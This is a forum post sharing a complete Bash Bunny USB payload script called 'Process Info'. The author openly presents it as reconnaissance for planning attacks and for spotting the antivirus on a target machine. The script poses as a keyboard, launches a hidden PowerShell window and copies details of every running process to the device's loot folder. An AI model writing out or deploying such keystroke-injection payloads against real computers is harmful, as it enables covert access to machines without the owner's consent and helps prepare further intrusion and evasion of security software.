Decoy Posted April 1, 2017 Share Posted April 1, 2017 (edited) This is just a quick and dirty payload to return all running processes under the current user. This will return the path/filename/version, and quite a bit of other info as well. This information can be useful for planning future attacks, such as taking advantage of buffer overflows, and other various vulnerabilities to gain a more permanent foothold into a target system. It can also be useful in identifying what AV is in use on a target system. An example of useful process info: Name : avpui Id : 724 PriorityClass : Normal FileVersion : 126.96.36.1993 Path : C:\Program Files (x86)\Kaspersky Lab\Kaspersky Total Security 17.0.0\avpui.exe Company : AO Kaspersky Lab CPU : 85.875 ProductVersion : 188.8.131.523 Description : Kaspersky Anti-Virus Product : Kaspersky Anti-Virus https://github.com/DeeKoy/bashbunny-payloads/tree/master/payloads/library/ProcessInfo #!/bin/bash # # Title: Process Info # Author: Decoy # Version: 1.0 # Category: Recon # Target: Windows XP SP3+ (Powershell) # Attackmodes: HID, Storage # # # Amber Blink Fast.....Initialization # Amber................Begin # White Blinking... ...Moving loot to mass storage # Blue Blinking........Syncing File System # Green................Finished # Initialization LED R G 100 # Create loot directory mkdir -p /root/udisk/loot/ProcessInfo # Runs minimized powershell gathering process information for potential future attack vectors LED R G ATTACKMODE HID STORAGE QUACK DELAY 6000 QUACK GUI r QUACK STRING "powershell -NoP -NonI -W Hidden" QUACK ENTER QUCK DELAY 1000 QUACK STRING "\$Bunny = (gwmi win32_volume -f 'label=\"BashBunny\"' | Select-Object -ExpandProperty DriveLetter); Get-Process | Format-List -Property * | Out-File \$Bunny\\loot\\ProcessInfo\\ProcessInfo.txt; exit" QUACK ENTER LED R G B 100 sleep 1 # Sync File System LED B 100 sync; sleep 1; sync # Trap is clean LED G Edited April 1, 2017 by Decoy Quote Link to comment Share on other sites More sharing options...
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.